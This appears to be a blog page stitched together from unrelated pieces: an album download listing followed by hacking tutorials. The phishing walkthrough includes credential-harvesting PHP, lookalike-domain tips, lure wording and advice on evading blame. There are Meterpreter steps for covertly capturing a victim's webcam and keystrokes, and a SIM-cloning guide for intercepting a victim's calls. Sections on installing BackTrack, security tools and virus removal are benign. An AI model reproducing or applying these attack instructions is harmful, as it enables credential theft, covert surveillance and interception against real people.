>

Drake & Future what a time to be alive (2015)

Drake & Future - What A Time To Be Alive (2015)

320kbps
01. Digital Dash
02. Big Rings
03. Live From the Gutter
04. Diamonds Dancing
05. Scholarships
06. Plastic Bag
07. I'm the Plug
08. Change Locations
09. Jumpman
10. Jersey
11. 30 for 30 Freestyle

Download

Phishing

Fake it till you make it.

What is Phishing ?
Phishing is the act of attempting to acquire information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing emails may contain links to websites that are infected with malware etc. Phishing is typically carried out by email spoofing or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one.

This tutorial will explain you how to create fake login page for phishing, in this case we are going to go with Gmail as an example. This Procedure can be used to make fake pages for any other website in the same way. Yahoo!, Facebook, Myspace – Any website you want can be made using this tutorial.

Step 1:
Head over to the website gmail.com. Right Click anywhere and Save the Page as an HTML file.

Step 2:
Once you save the login page completely, you will see a HTML file and a folder with the name something like Email from google files.There will be two image files namely “google_transparent.gif”, “mail_logo.png”.

Step3:
Now we need to upload these images to any online image hosting website, for example – tinypic.com, postimage.com or photobucket.com. After uploading go to the image where you uploaded it and copy the URL of each image.

Step4:
Open the HTML file in any text editor like NotePad or MS Word.(You can use CTRL + F for the following)- Search for “google_transparent.gif” (without quotes) and replace it with corresponding URL. Search for “mail_logo.png” (without quotes) and replace it with corresponding URL.

Step 5:
In the same file, Search for :
action=”https://www.google.com/accounts/ServiceLoginAuth”

And replace it with :
action=”http://yoursite.urlhere/login.php”

(You have to write down your fake websites URL there, See Step 7 for creating it.)
Now save the file.

Step6:
Now you need to create a PHP file called “login.php”. So open up a text editor (like NotePad) and type the following (You can copy it from this pastie):

<?php $handle = fopen(“password.txt”, “a”);
fwrite($handle,$_POST[“Email”]);
fwrite($handle,”\n”); fwrite($handle,$_POST[“Passwd”]);
fwrite($handle,”\n”);
fwrite($handle,”\n”);
fclose($handle) ;
header(“Location:https://www.google.com/accounts/ServiceLoginAuth”);
exit;
?>

Now Save it as login.php

Step 7:
Open up notepad again and just save a new file as “pswrds.txt” without any contents.(Empty file)

Now upload those three files(namely :- index.html, login.php, pswrds.txt) in any of subdomain Web hosting site. (Note: that web hosting service must have php feature.)
You can use the following :
sites:110mb.com
spam.com
justfree.com
007sites.com
(or simply google it).

Follow the instructions in the Web hosting site and setup you fake login page. Make sure you name the URL something like g00gle.com or anything that you think would be the least suspicious.(Just make sure the URL doesn’t stand out in the address bar as it may alert the victim.)

Step 8:
Create a fake email account, that is if you prefer to send the phishing webpage link anonymously.

Step 9:
And now all you have to do is send the victim something like: ‘Gmail starts new feature : To use this service, log in to this page’ ,along with this send the link to your fake website.

Note: For user to believe change your phishing web page url use any of free short url sites like : co.nr, co.cc,cz.cc
This will make users to believe that it is correct url.
Nevertheless, if you do get caught act like you had no clue: ‘OMG ! I logged in to that website too , I’m going to change my pass now ! you do the same, quickly !’.

Protecting Yourself :
Phishing webpages are meant to fool the victim into thinking that the website they are logging into is genuine whereas it is actually a completely different website. The only sure-fire way to protect oneself from being the victim is to always make sure that the website you are giving your account and password to is bona fide by simply peeking at the address bar in your web browser. Also, avoid following any links from any dodgy websites, scam emails or even the comment sections in various places.
Everyone is guilty until proven innocent. Assume hostility or accept vulnerability.

*EDIT: This method currently does not work. At the time of writing, the files we upload to the hosting website were the same as mentioned here. As of now, however, these files are nowhere to be found. For some reason, the Gmail team seems to modify and change the log in page almost every other week causing the phishing method to be slightly different every time. Hence, kindly try out other hacking techniques for the time being. Since the phishing method is practically the same barring a few file names .You may also attempt the same method with other websites (Yahoo!, Facebook etc.) on your own.

Installing backtrack

The end of the beginning.

How to Install BackTrack 5(contents)

►Download the BackTrack 5 ISO
►Setting up a Virtual Machine
►Installing BackTrack 5
►BackTrack Login
►(Optional) Creating a Bootable USB Drive

►Download the BackTrack 5 ISO
Head over to: http://www.BackTrack-linux.org/downloads/ Then click the download button.

After that, you need to pick the version of BackTrack that you want. Pick the latest one, it’s BackTrack 5 R3 at the time of writing this tutorial. The window managers(KDE and Gnome) are both pretty much equal, choose any. Pick the architecture according to your system’s specs(Right click on My computer to find out, 32 bit or 64 bit) . We want the ISO file type because we can use it on a DVD, a USB flash drive, and install on a virtual machine. Direct download or torrent download is up to you. The file is little over 3 GBs, so it may take some time depending on your internet speeds.
(You’re now setting up a whole new operating system, which takes time, So I suggest you read this tutorial before beginning once completely, and then refer to it if you get stuck, it’s relatively easy)

►Setting up a Virtual Machine
A virtual machine (VM) is the software implementation of a physical computer. In other words, it’s having another computer on your current computer. If you have never used a virtual machine it is a good time to start. VMs are excellent when it comes to practicing your hacking techniques as they provide somewhat of a safe closed environment, such that any damage, if it occurs is contained within the dummy operating system, which can then be simply restarted to start afresh.

To start, you’re going to need to get VM software. There are many out there, here are a few popular ones.
VMware Player (Windows/Linux) – Free
VirtualBox (Windows/Mac/Linux) – Free

Whichever VM software you go with, make sure it has a way to network with other VMs. If you don’t want to spend the money, go with VirtualBox. If you plan to get serious with penetration testing, you might want to consider getting a VMware Workstation license. It is full of useful tools and goodies such as sharing VMs and remote access and easy to work with. The easiest to install is ‘Windows Virtual PC’, it will do for beginner purposes. These programs are very similar in function. You shouldn’t have trouble following the basic setup instructions.(Google any Virtual machine software and install it)

After everything is installed and running, click “Create new virtual machine”. (Depending on which one you install, the instructions might be a little different. If you look around there will definitely be similar options).

Next you’re going to select “Installer disc image file” then browse for the BackTrack 5 ISO.
Select the operating system as linux, and the version as Ubuntu.

Give the virtual machine a name such as “BackTrack 5 R3” and select a location for where you want to save the virtual machine files.

When asked how much you want the virtual disk drive to be, you want at least 25 GB. This will be the most demanding requirement of BackTrack 5. Although the BackTrack-linux wiki says you need at least 20 GB, I found you will run out of space by the time you install updates or any other software (Feel free to put in even 5-15 Gb, if you simply want to look around. The OS is not the big, the tools are). Then, you will have the option of storing the virtual disk as a single file, or split into multiple files. Creating a virtual disk as a single file will allocate all of the space right away. Splitting into multiple files means the drive files will grow as you need them. So if your hard drive space is limited on your host system, go with multiple files. If you have a massive drive, and not worried about space, go with a single file.

And that’s it! The virtual machine is ready to go. The recommended minimum RAM is 512 MB, however you can try lower if you need to.
Power on the virtual machine and you will be ready to install BackTrack.

►Installing BackTrack 5
If you are installing on a hard drive, you will need to burn the BackTrack 5 ISO on to a DVD or a USB Drive.
First turn on your machine, then insert your DVD or USB Drive. Then press the key that allows you to select your boot drive. You may have to go into the bios to enable this. Most often, F12 will work. Select either your DVD drive, or your USB Drive to boot from it. (You may simply use the ISO file also. Windows virtua PC, for example gives an option to simply select an ISO file and start up directly)
After a few moments, you will see BackTrack Live CD menu. Press enter on ‘BackTrack Text – Default Boot Text Mode’.

Wait about 10 seconds, and you will come to BackTrack shell console. Type the command “startx” to load the GUI.(If you directly used the ISO file without burning it to anything, your operating system will be now ready. If you prefer to burn the file to a DVD or pen drive follow the steps below)
After another few moments, you will come to the desktop of BackTrack. Double click on the “Install BackTrack” to begin the install process.

After you select your time zone, and language, you then have to partition your drive. If you are using a virtual machine, go ahead and use the whole drive. If you are dual booting, you will have to specify your partition for your two operating systems.

Continue through the installer, and then click finish. BackTrack will then install on to your system. This process takes about 10-15 minutes.

►BackTrack Login
After it is finish, restart your system.
After restarting, you will come to a login screen.

The default root name for BackTrack is “root” and the password is “toor”. After typing in the root username and password, you will come back to the BackTrack shell. Type “startx” to enter the GUI desktop, and we’re done ! I recommend you look around get a feel of all the tools and applications that come pre-installed on the amazing BackTrack OS.

►(Optional)Creating a Bootable USB Drive
Required Items:
A USB flash drive with minimum space of 4 GB.
BackTrack 5 ISO
UNetbooin – ( http://unetbootin.sourceforge.net/ )

UNetbootin is a program that allows you to create bootable USB drives for linux distros and Windows. UNetbootin will download the distribution or use an ISO file you selected from your hard drive.

Once UNetbootin is downloaded you can run it by double clicking (Windows), plug in your USB Drive.
Start UNetbooin and select the “diskimage” option, then select your BackTrack 5 ISO.
Select your USB Drive, then click “OK”.
(WARNING: This will format your USB Drive and remove all previous data.)
Now you should be able to boot off of your USB Drive with BackTrack 5.

Hacking webcams

Take a peek, see what you're victim is doing. Because now you can.
It’s time to let out your inner creep. In this tutorial, we’ll be taking a look at how we can hack a webcam remotely and take a peek at what’s going on at the other side. We’ll use the powerful Meterpreter to hack into the victim’s webcam. We’ll take full control of the webcam, turn it on and get snapshots without anyone ever finding out (ideally).

In early 2014, a hacker was sentenced to 18 months for doing just this to Miss Teen USA, 2013. He broke into the computer, took a few clicks and blackmailed the victim to send more photos. (Google it up for more information) While the exact method he used is unknown, it’s very likely this exact method that we’ll be trying out. The point of this tutorial is to show just how easy it really is. While developing your own hacks and discovering loop holes is a whole different level of hacking, quite a lot of hacking can be done just by knowing a surprisingly small number of things. Perhaps not even that, after all we can simply search an exploit in metasploit and a get a whole list of things that’ll work. The hard part of hacking is breaking into a system while maintaining anonymity. Once that is done, we pretty much own the target system. Hacking is not about being a computer geek as much as being ‘in the know’.

Our best friend Meterpreter is going to help us with this hack. With Meterpreter we can install a keylogger, hack the webcam and the list goes on and on. You can basically do almost anything that you can do on your own computer, to your victim. All we need for this hack, is to first break in with Metasploit and install meterpreter on their system. How do we do that?
After picking an attack module to exploit a vulnerability, we have the option to set a payload. The payload tells metasploit what to do on the victim’s computer once it breaks in. Meterpreter is a payload. The command usually looks like:
Set payload windows/meterpreter/reverse_tcp
If the attack was successful, metasploit automatically installs meterpreter on the target system and we can move on to hacking the webcam, in this case. We can also get our meterpreter session by using exploits like Aurora (for IE6). After getting the meterpreter session in our command, you can follow the steps below to hack the webcam.

Step 1: Find if there is a webcam.
Metasploit’s Meterpreter has a built-in module for searching and controlling the remote system’s webcam (Because apparently there are so many creepy hackers that we now have this hack at our fingertips). We can start off by searching if the system even has a webcam or not.me. The command below is used for that, it also returns us the name of the webcam.
meterpreter > webcam_list
If a webcam was found, Meterpreter will them all out. Usually we just find one.

Step 2: Say Cheese!
If the last command gave us a webcam we can go ahead and snap a photo:
meterpreter > webcam_snap
If all went fine a picture will be saved in the directory: /opt/framework3/msf3 We can simply go there and see what we got. We can’t do anything about the quality of the image, it all depends on the webcam. Still, better than nothing, right?

Step 3: Streaming video.
So we got a picture, let’s see how to get a live video stream. We can do this by typing the command below: (We’re using –p parameter to specify the directory we want to give to the video streaming file)
meterpreter > run webcam -p /var/www
This command fires up the victim’s webcam and sends its video output to /var/www/webcam.htm. You can open up this file and check out what’s going on at the other end in live video feed.
Another thing that deservers mention here is the little light that is often found next to many laptop cameras and on some separate webcams too. Will the light be turned on by this hack? It depends on the way the camera manufacture implemented the ‘take a photo’ and ‘take a video’ functions and on which software is set as default to use the camera. So this hack is not all that risk-free. But then again, what’s life without a little risk? (Just kidding, people go to jail for this. Be careful.)
Protecting yourself
In 3 small commands we can peek into our victim’s webcam. How to make sure this doesn’t happen to you? This hack has a very complicated and highly technical flaw: It can be completely stopped by something as little as a tissue on the webcam.
So the easiest solution is to just cover up your webcam. Nowadays, webcams with a sliding cover are becoming more and more popular. But this is just treating the symptom, not the disease. If someone across the globe can control your webcam, it means that your system has some vulnerable software. The hacker might think, ‘if not the webcam, maybe I’ll settle for a keylogger’, which is just as easy. You need to stop the attacker’s metasploit from ever getting access to your system. The only way to do that is to keep all your applications up to date and keep an eye on the news for zero day exploits so your precious computer can live to hack another day.

Remote keyloggers

Because the keylogger is mightier than the sword

In this tutorial, we’ll attempt to remotely install a keylogger. This one is actually quite basic, so without further ado, let’s begin.

Fire up Metasploit and let’s get started. Like before, we’re assuming that the system has already been broken into and we have the meterpreter session.

Step 1: Find a program.
The way the keylogger in Meterpreter works is, you have to attach it to a running program. Say for example, we find that the victim’s computer is running an internet browser, a game and MS Word. Clearly there’s two items of interest in there. We can attach the keylogger to the browser or MS Word to get whatever’s being typed in these two applications. So, first we check what all processes are running on the target system using the following command:

meterpreter >ps

Usually you’ll get a very long list of items. The two columns we’re interested in are PID (Process ID) and process name. For this step you may want to google up the names of some processes to see which programs they belong to or if you find the ones you know of, like chrome.exe (Google Chrome) or notepad.exe then you can use these. We need to migrate meterpreter to the corresponding PID. Suppose we found wordpad.exe at PID=1440

meterpreter > migrate 1440

You should see a message “Migration completed successfully”.

Step 2: Start the Keylogger
Now we can embed the keylogger into the program.The Meterpreter keylogger is a built-in feature called keyscan. We can start it up by the following command:

meterpreter> keyscan_start

This should successfully attach the keylogger to our preferred program and the keylogging will start immediately.

Step 3: Dump the logged Keystrokes
So, in the previous step we hooked up a keylogger to the WordPad application running on our victim’s computer. It’ll keep running until we tell it to stop (or the victim shuts down the computer). We can recover whatever the keylogger has logged by the following command. You might want to wait a while, maybe grab a snack while the keylogger is running on the system just to give it enough time to log something. It’s pretty much hit and trial since we don’t know when the victim is going to choose the application we’re keylogging and type something in it. They could be typing in it just as we hooked up the keylogger or they may not use the application for hours.

meterpreter> keyscan_dump

If all went great and the victim actually typed something in our chosen application meterpreter will print out everything in our command shell. You could try using different applications to get different results. Obviously you’ll not get anyone’s passwords by keylogging WordPad whereas chrome.exe and firefox.exe are much more likely to give us something of more interest

Uprooting viruses

Kill it before it lays eggs.

How to remove and avoid computer viruses ?
A computer virus is malicious software (also known as “malware”) that can copy itself and infect other software or files on your computer.
If you suspect your computer has been infected, then several antivirus websites provides step-by-step instructions for removing viruses and other malware.
Fortunately, if you update your computer and use free antivirus software such as AVG, you can help permanently remove unwanted software and prevent installation in the first place.

How do I know if my computer has been infected? After you open and run an infected program or attachment on your computer, you might not realize that you’ve introduced a virus until you notice something isn’t quite right. Here are a few indicators that your computer might be infected:

►Your computer runs more slowly than normal.
►Your computer stops responding or freezes often.
►Your computer crashes and restarts every few minutes.
►Your computer restarts on its own and then fails to run normally.
►Applications on your computer don’t work correctly.
►Disks or disk drives are inaccessible.
►You can’t print correctly.
►You see unusual error messages.
►You see distorted menus and dialog boxes.

These are common signs of infection—but they might also indicate hardware or software problems that have nothing to do with a virus. Unless you run some kind of Malicious Software Removal Tool and install industry-standard, up-to-date antivirus software on your computer, there is no way to be certain if your computer is infected with a virus or not. Beware of messages warning you that you’ve sent email that contained a virus. This can indicate that the virus has listed your email address as the sender of tainted email. This does not necessarily mean you have a virus. Some viruses have the ability to forge email addresses. In addition, there is a category of malware called rogue security software that works by causing fake virus alerts to pop up on your computer.

How do I install updates and antivirus software if I can’t use my computer? It might be difficult to download tools or update your computer if your computer has a virus. In this case, you can try one of the following options:

►Use another computer to download the tools to a disk.
►Get help through your Antivirus’s website support.
►Have your system checked by a Technician

How can I prevent infection by computer viruses?
Nothing can guarantee the security of your computer, but there’s a lot you can do to help lower the chances that you’ll get a virus.
It’s crucial to keep your antivirus software current with the latest updates (usually called definition files) that help the tool identify and remove the latest threats. You can continue to improve your computer’s security and decrease the possibility of infection by using a firewall, keeping your computer up to date, maintaining a current antivirus software subscription, and following a few best practices.
Tip: Because no security method is guaranteed, it’s important to back up critical files on a regular basis

Hacking tools

Nothing deters conflict like a bully with big guns, right?

MetaSploit – Metasploit is an framework which is used for the hacking of different kinds of applications,operating systems,web applications etc., Metasploit contains various exploits, payloads,modules etc. Metasploit Framework is especially used by many of the hackers to generate payloads and attack the systems. As Metasploit is an open source where any one can use it. This framework supports different operating systems like winodws, linux ,mac os x etc., Metasploit is preloaded in the Backtrack linux as there is no need for the backtrack users to install the metasploit again and again. IMHO, Metasploit is the single most powerful and useful tool for a wide variety of hacks. Personally, I like it so much I put it before the list of common tools. Remember this name: “Metasploit”. Below are a few more extremely helpfup and common tools, sure to be found in any hacker’s computer.

1. Nmap- Nmap (“Network Mapper”) is a free and open source (license) utility for network discovery and security auditing. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics.

2. Wireshark- Wireshark is a network protocol analyzer. It lets you capture and interactively browse the traffic running on a computer network.

3. Metasploit Community edition- Metasploit Community Edition simplifies network discovery and vulnerability verification for specific exploits, increasing the effectiveness of vulnerability scanners. This helps prioritize remediation and eliminate false positives, providing true security risk intelligence.

4. Nikto2- Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files/CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software.

5. John the Ripper- John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix systems, supported out of the box are Windows LM hashes, plus lots of other hashes and ciphers in the community-enhanced version.

6. ettercap- Ettercap is a comprehensive suite for man in the middle attacks. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols and includes many features for network and host analysis.

7. NexPose Community edition- The Nexpose Community Edition is a free, single-user vulnerability management solution. Nexpose Community Edition is powered by the same scan engine as Nexpose Enterprise and offers many of the same features.

8. Ncat- Ncat is a feature-packed networking utility which reads and writes data across networks from the command line. Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat. It uses both TCP and UDP for communication and is designed to be a reliable back-end tool to instantly provide network connectivity to other applications and users. Ncat will not only work with IPv4 and IPv6 but provides the user with a virtually limitless number of potential uses.

9. Kismet- Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and (with appropriate hardware) can sniff 802.11b, 802.11a, 802.11g, and 802.11n traffic. Kismet also supports plugins which allow sniffing other media such as DECT.

10. w3af- w3af is a Web Application Attack and Audit Framework. The project’s goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend.

11. hping- hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping(8) unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.

12. burpsuite- Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.

13. THC-Hydra- A very fast network logon cracker which support many different services.

14. sqlmap- sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

15. webscarab- WebScarab has a large amount of functionality, and as such can be quite intimidating to the new user. But, for the simplest case, intercepting and modifying requests and responses between a browser and HTTP/S server, there is not a lot that needs to be learned.

Mobile Number Cloning: How To Clone A Number Easily

Mobile Number Cloning : How To Clone A Number Easily !

The Ultimate Tool to spy on somebody is in every everybody's pocket ! The Modern Engineering marvel aka Mobile Phone's are everybody's need. People often (mostly) do their confidential talks over cell phone's, But only some know how easy it is to eavesdrop them. There are some tricks and hacks to do that, but the most powerful way is to clone their SIM Card. The Subscriber Identity Card aka SIM Card is the transmitter of signal to the mobile and tower, And you can do It easily.

So What Can You Do When You Clone SIM card ?

Well There are many things to do when you clone a SIM Card, You can secretly spy on the victims calls and data transfers, make him mobile bill go crazy, send messages and make calls from his number, All without touching the victims Cell Phone.

First A Little Knowledge Of SIM Hacking :

Not every SIM Card is clone-able, There are two types of SIM Card :

COMP128v1: The most popular and clone-able version of SIM Cards, Distributed widely till 2004 in USA (2007 In ASIA Countries), Of the number of victim is older than 2004 in USA or 2007 in Asia, Chances are you can clone it pretty easily.

COMP128v2: The newer SIM's, Capable of better 3G Reception, Video Call Support, New and Secure firmware, Complex Design, Very ( I mean very fu*king very) Hard. If the SIM is bought after 2004, it is probably this version.

Things Required :

Blank SIM Programmable Cards : http://www.ownta.com/blank-sim-card-without-phone-numbers.html

A SIM Firmware Writer : http://www.ebay.com/itm/ES9P-16-in-1-Sim-Card-Reader-Writer-Copy-Cloner-Backup-Kit-New-Useful-2013-/281054905820

Or Make your own SIM Writer : CLick Here

Software For Reading : Woron Scan :
http://www.live-share.com/files/2505..._scan.rar.html

http://w13.easy-share.com/2588031.html

http://tinyurl.com/3ytpyb

The Victim's SIM For 15 minutes to 30 Minutes !

So The inventory is full, Lets Begin The Work :

The main mission in cloning a SIM Card is to get KI and IMSI codes, these codes are the identifier of the SIM Card, and help youregister your mobile to the network. 



The Step 1 :

Plug in the SIM Reader, Install the software, get the vic's SIM.

Step 2 :

Configure the Software as shown in the below pictures :

Step 3 :

First Run The IMSI Search :

Note Down The IMSI Number !

When the results come, write them down. Then start the ICC Search :

Note This Value Down Too.

Write down the ICC Number too, Now run the KI Search, This may take some time :
After 45 Minutes, IF you don't Get the First Value,The Sim IS Un-cloneable !

Now remove the Vic's SIM And give it back to him.

Step 4 :

Download SIM-EMU, A software to writesettings on Blank SIM Card.

Now insert the blank SIM and wait for it to detect.

Step 5 :

Run SIM-EMU and click the configure tab, 

Enter the ALL the Info Gathered from the Woron Scan Process: IMSI, KI, ICC.

The Setup Menu

For the rest Info :

For ADN/SMS/FDN# (ADN= Abbreviated Dialing No. / SMS = No. of SMSes stored on SIM / FDN = Fixed Dialing No.) Enter: 140 / 10 / 4 OR if the Program has suggested values, let it remain as it is.

The Phone Number should be in International Format, EG: For India +91(the international code) 9999999999 (the number)

Step 6 :

Let The Writing Begin, Select the Write To Disk button and Name the File: SuperSIM.HEX.

Wait For The Conformation, Then Select OK.
A write EEPROM file window will appear. Name the EEPROM file SuperSIM_EP.HEX and click the Save button.
Now You Have 2 Files, Ready to be Flashed.

Step 7 :

Now We Flash the files on Blank SIM Card  :

Install the card that came with the card writer, cause using any other software will fu*k up your card and your reader.

Our Card Readers Software was Infinity USB Unlimited, The interface can be changed in your software, but the functioning is the same. 

Now Put the required files in the appropriate fields :

Flashing The Blank SIM.

Step 8 :

Now run the writing task, Click on done when it has completed.

Congrats, You Have Cloned A SIM Card ! 

So here you have it, A Cloned SIM Card, Now when somebody calls the victim, Both of the mobiles will ring, same will happen in the case of SMS, But only one can pick up the call. Also don't do something big that will raise a red flag in Mobile Company. You are responsible for your own Shit.

So how was this post ? Love/Hate/Spot A Mistake ? Leave you feedback on the comment section below or on Facebook, Twitter Or Google + . Also If you want us to write an article on something please leave it below and we'll publish the article as soon as we can.

Do it yourself guide to remove virus from your computer


How To Manually Remove a Virus From Your Computer

Learn how to manually remove virus easily from your PC by watching this video:

This guide focuses on manually removing viruses and malware from your computer. If you want to use an anti-virus program instead, please check out this tutorial written byBurritobob. This tutorial's best intention is focused around removing RAT and Keylogger viruses.

Step 1
Run msconfig and look for suspicious files. Here we see one. It’s unknown, and it also has a startup key that we’ve never seen until recently. Uncheck it from start up and/or from services.

If you think you are being monitored. Open Command Prompt and do the following

Step 2
Boot into safe mode. This can be done by checking the box in the “boot” tab in msconfig.

Step 3
Run msconfig in safe mode and we can see it’s checked because the virus is persistent. The virus will not be running however, due to the fact that we are currently in safe mode.

Step 4
Navigate to the registry. We are doing this in safe mode because some viruses disable the registry. 
Note: Be sure your folder options are set to show hidden files and folders

Step 5
Navigate to the location of the virus. If you are not sure which one is a virus, locate to all of the following possible locations:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runonce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run

Step 6
Section a) if you are unsure if it is a virus of not, right click the suspected file{s} and click modify

Since you are unsure of the integrity of the file, put a “:” in front of the value data. This will disable the start up of the virus but it will still be in your computer.

Section b) if you are certain that you’ve found the virus (like I have in the picture) you can delete the registry entry.

Step 7
Be certain it is gone; it shouldn’t even be listed as a startup item anymore.

Step 8
To be certain, use CCleaner to scan the registry and fix any issues there are.

Recap
Hopefully this should’ve gotten your computer rid of any viruses. It is recommended to download the latest version of an Anti-Virus program and scan your computer fully even after doing this.

Please Note: If you still feel insecure it is recommended to do a clean reinstall of Windows. After reinstalling, install Microsoft Security Essentials as it is the most trusted anti-virus.

Thank you for reading  

 

Can't find your answer ? Ask Americascomputergenius@gmail.com

Understanding Virus

Keep your friends close and enemies closer.

Contrary to popular belief, hacker’s own machines are often more vulnerable to attacks than the average user. This is especially true of those who are new to the world of hacking because of their more frequent access to remote machines, dodgy forums, open administrative privileges on their own machines and inexperience in covering their tracks etc. Further, those who are experienced often take advantage of the ones who are in the learning stage, trying to get into this field. In this dog-eat-dog world, any kind of safety is an illusion unless proven otherwise. Again, for the newbie hacker, it is of vital importance to learn how to protect themselves to avoid being consumed by their own curiosity.

Viruses are perhaps the oldest form of malicious software. They’ve been around for a long time and are still evolving and causing havoc all over the world. At first sight, they seem to be innocent looking executable files, but if opened they can turn your world upside down in a second. Reliance on antivirus software is fine as a first line of defense, but you need a basic arsenal of skills for securing the executables on your system and coping with viruses on your own. Here we discuss proactive methods you can use to defend yourself against malicious executable code in files, resources, component libraries, scripts and macros, as well as how to avoid a handful of other potential vulnerabilities.

Depending on how destructive their payload, computer viruses can result in a significant loss of data, time, and money. In the best scenario, you may just lose the time it takes to disinfect your computer. At worst, a mission-critical server may be reduced to little more than an expensive door-stop. Unfortunately, antivirus software isn’t perfect, and there’s always some lag between the emergence of a new electronic predator and the availability of virus definitions to protect against it. Moreover, many programmers of today’s more diverse and sophisticated computer viruses are taking the preemptive step of disabling or even removing antivirus software as part of their operation.

I’m not suggesting that you shouldn’t rely on your antivirus programs for day-to-day virus protection, especially since antivirus programs are very good at keeping you safe from known threats. However, if you’ve never had to fight a virus without your antivirus software, then it’s only a matter of time before you will. The main reason for this is new viruses. For an antivirus to be able to guard against new viruses, it must first be reported, the virus scanning code must be modified to include this new virus, and finally the virus database copy on the client side must be updated.
Because virus protection changes every day, those annoying notifications that your antivirus probably gives routinely are there to protect you. You must’ve noticed in the UPDATE menu of any antivirus an option to “Update Virus Database” or something like that. This is evidence of the ongoing war against viruses.

In general, how do viruses work? Well, first, the programmer writes the executable code required to carry out the virus’s activation process and then whatever nasty things it’s meant to do. What does the author want the virus to accomplish? Should it reformat your hard drive? Delete JPG files? Mail copies of itself to your friends and coworkers? Making any of this happen requires “executable” code of some kind. Second, in order for this code to execute, the virus needs to be activated or opened. The usual way a virus’s executable code is run is the direct method: some unwary user receives an e-mail attachment called “Click-Here.exe” or something equally enticing. This runs the program and the virus is unleashed.

As easily avoided as this result seems to be, it still works far more often than it should. Virus writers have discovered a number of other, less obvious techniques for getting a virus to take over your computer. Below we take a look at some of these techniques, beginning with the question of what constitutes executable code, then we’ll examine several sneaky activation methods. These activation methods are particularly important, as this is where you’ll understand how to completely unhook viruses from your system in order to regain control of it following an infection.

What Constitutes Executable Code?
Of course, you know that .exe files are executable, as are other similar file types such as .cmd and .com etc. There are many other file types that may contain executable code, and any executable code can be unsafe. In general, executable code falls into three broad categories: standalone programs, code included within resources or libraries, and script or macro code executed by an interpreter of some kind. In a broad sense, a standalone program is pretty much any file type that relies on the operating system for it to execute. How do you know which ones these are? The answer lies in the Windows® registry. To battle against viruses on their own turf, you’ll have to be very comfortable delving into the registry. So let’s take a look at how executable programs are invoked (A little technical, read slowly).

Launch the Registry Editor by opening “Run” and type “regedit”, and expand the HKEY_CLASSES_ROOT (HKCR) node.It’s the operating system’s repository for information on file associations and commands. Under HKCR, you’ll find nodes representing all the file type extensions registered on your computer. Navigate down the tree until you locate the key named .exe. Select this node and observe that its default value (shown in the right-hand pane) is exefile. This is a pointer to another node under HKCR (the exefile key). Scroll down and find the exefile folder. The exefile key contains a shell subkey. This is where a file type’s available actions are defined. In OS terminology, these actions are known as verbs. For example, a Microsoft® Word document might have a “print” verb defined, which allows you to right-click the file in Windows and choose Print from the context menu. Expand the shell subkey for the exefile node to view the available verbs for EXE files. You’ll probably see two or three different subkeys, depending on your system. The one to be concerned with is “open.”(HCKR ->exefile ->shell ->open) Expand this node and select its command subkey. Each verb has its own subkey, and each of those keys in turn has its own command subkey. The default value in this subkey dictates exactly what happens when that verb is executed.

Double-clicking the file icon in Explorer has the same effect—it executes the default verb’s command (open for EXE files). As you can see, for EXE files, the open command verb has a value of: %1 %* This is used in MS-DOS® batch file language. The basic idea is that the path and file name of the EXE file you activated are substituted for the “%1″ parameter, while any switches or command-line parameters that go along with it are passed through the “%*” parameter. So it would stand to reason that any other file types whose open verb evaluates to some flavor of “%1″ would tend to pose a risk. There are a number of these, and they’re all potentially dangerous. Considering that the virus writer knows that most people won’t double-click a file with a .exe extension or a .bat file, there are several other options including : .cmd .com, .pif, .vbs – All of these file types have a default open verb of %1. A virus writer could simply change the .exe extension of his virus executable to ,say .com, and s/he probably just increased the chances that the unsuspecting masses will run it. Particularly dangerous is (was, actually) the humble screen saver file type (.scr extension). Close to the start of the 21st century, .scr viruses were literally everywhere. They were widely believed to be power-saving, which is so not true (Stand-by mode is much better). People thought it couldn’t hurt, right? so what’s the harm. So 